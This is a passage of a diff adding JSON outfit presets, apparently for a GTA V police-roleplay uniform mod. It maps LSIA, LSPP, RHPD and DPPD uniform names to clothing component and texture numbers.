+"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSIA Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSIA Plain Clothes", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "63:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "102:1", +"Pants": "1:13", +"Shoes": "2:1", +"Accessories": "1:1", +"Armor": "41:1", +"Parachute": "69:1" + }, + { +"Name": "Female LSIA Plain Clothes", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "161:1", +"UpperSkin": "2:1", +"Decal": "1:1", +"UnderCoat": "173:1", +"Pants": "1:1", +"Shoes": "50:1", +"Accessories": "7:1", +"Armor": "43:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSPP Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:9", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Male LSPP Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:9", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "33:1" + }, + { +"Name": "Male LSPP Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:9", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "33:1" + }, + { +"Name": "Male LSPP Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "136:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:16", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPP Utility Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:11", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:9" + }, + { +"Name": "Male LSPP Utility Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "213:11", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:9" + }, + { +"Name": "Female LSPP Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:9", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Female LSPP Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:9", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Female LSPP Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:9", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Female LSPP Utility Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:11", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:9" + }, + { +"Name": "Female LSPP Utility Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:11", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:9" + }, + { +"Name": "Female LSPP Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:16", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPP Motorcycle Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "18:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:9", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "33:2", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Male LSPP Motorcycle Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "18:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:9", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "33:2", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Male LSPP Motorcycle Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "18:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:9", +"UpperSkin": "27:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "33:2", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Female LSPP Motorcycle Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "18:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:9", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "32:2", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Female LSPP Motorcycle Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "18:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:9", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "32:2", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Female LSPP Motorcycle Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "18:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:9", +"UpperSkin": "29:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "32:2", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "33:1" + }, + { +"Name": "Male LSPP Harbor Patrol", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "136:22", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:16", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "88:1", +"Pants": "88:3", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "9:2", +"Parachute": "49:1" + }, + { +"Name": "Female LSPP Harbor Patrol", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "135:22", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:16", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "66:1", +"Pants": "91:3", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "10:2", +"Parachute": "49:1" + }, + { +"Name": "Male LSPP Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "21:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPP Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "33:1" + }, + { +"Name": "Female LSPP Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "175:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSPP Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPP Plain Clothes", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "3:10", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "11:6", +"Shoes": "4:2", +"Accessories": "7:1", +"Armor": "42:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSPP Plain clothes", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "15:9", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "4:2", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "44:1", +"Parachute": "1:1" + }, + { +"Name": "Male RHPD Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "201:14", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "73:1" + }, + { +"Name": "Male RHPD Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "194:14", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "73:1" + }, + { +"Name": "Male RHPD Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "191:14", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "73:1" + }, + { +"Name": "Male RHPD Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "144:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "1:1" + }, + { +"Name": "Male RHPD Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "188:9", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "73:1" + }, + { +"Name": "Male RHPD Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "312:17", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "49:1" + }, + { +"Name": "Male RHPD Bicycle Patrol", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "50:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "312:17", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "13:3", +"Shoes": "3:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male RHPD Utility Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "210:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:7" + }, + { +"Name": "Male RHPD Utility Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "213:7", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:7" + }, + { +"Name": "Male RHPD Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "179:14", +"Pants": "23:1", +"Shoes": "21:1", +"Accessories": "39:3", +"Armor": "39:1", +"Armor": "39:1", +"Parachute": "69:1" + }, + { +"Name": "Male RHPD Detective", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "350:14", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "23:1", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "39:1", +"Parachute": "11:3" + }, + { +"Name": "Male RHPD Armor Protection", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "349:14", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "132:1", +"Pants": "23:1", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "39:1", +"Parachute": "1:1" + }, + { +"Name": "Male RHPD SWAT", +"Gender": "Male", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "151:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:5", +"Top": "221:12", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "93:5", +"Pants": "32:2", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:9", +"Parachute": "49:1" + }, + { +"Name": "Female RHPD Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "203:14", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "73:1" + }, + { +"Name": "Female RHPD Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "196:14", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "73:1" + }, + { +"Name": "Female RHPD Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "193:14", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "73:1" + }, + { +"Name": "Female RHPD Utility Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "66:7" + }, + { +"Name": "Female RHPD Utility Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:7", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "66:7" + }, + { +"Name": "Female RHPD Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "336:17", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Female RHPD Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "141:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Female RHPD Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "190:9", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Female RHPD Bicycle Patrol", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "48:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "336:17", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "15:3", +"Shoes": "11:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female RHPD Detective", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "2:15", +"UpperSkin": "2:1", +"Decal": "1:1", +"UnderCoat": "172:19", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "41:1", +"Parachute": "1:1" + }, + { +"Name": "Female RHPD Detective (vest)", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "282:19", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "162:1", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "41:1", +"Parachute": "1:1" + }, + { +"Name": "Female RHPD SWAT", +"Gender": "Female", +"Category": "EUP", +"Category2": "RHPD", +"Hat": "150:2", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:12", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "31:2", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:9", +"Parachute": "49:1" + }, + { +"Name": "Male DPPD Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:15", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "74:1" + }, + { +"Name": "Male DPPD Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:15", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "74:1" + }, + { +"Name": "Male DPPD Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:15", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "74:1" + }, + { +"Name": "Male DPPD Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "144:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "1:1" + }, + { +"Name": "Male DPPD Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "74:1" + }, + { +"Name": "Male DPPD Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:18", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "49:1" + }, + { +"Name": "Male DPPD Bicycle Patrol", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "50:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:18", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "13:3", +"Shoes": "3:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "49:1" + }, + { +"Name": "Male DPPD Utility Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:8" + }, + { +"Name": "Male DPPD Utility Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "213:8", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:8" + }, + { +"Name": "Male DPPD Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "180:2", +"Pants": "23:2", +"Shoes": "21:1", +"Accessories": "1:1", +"Armor": "40:1", +"Parachute": "69:1" + }, + { +"Name": "Male DPPD Detective", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "5:3", +"Mask": "1:1", +"Top": "293:2", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "23:2", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "40:1", +"Parachute": "1:1" + }, + { +"Name": "Male DPPD Armor Protection", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "5:3", +"Mask": "1:1", +"Top": "293:2", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "132:1", +"Pants": "23:2", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "40:1", +"Parachute": "1:1" + }, + { +"Name": "Male DPPD SWAT", +"Gender": "Male", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "151:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "39:1", +"Top": "221:11", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "104:1", +"Pants": "32:2", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:8", +"Parachute": "49:1" + }, + { +"Name": "Female DPPD Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:15", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "74:1" + }, + { +"Name": "Female DPPD Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", 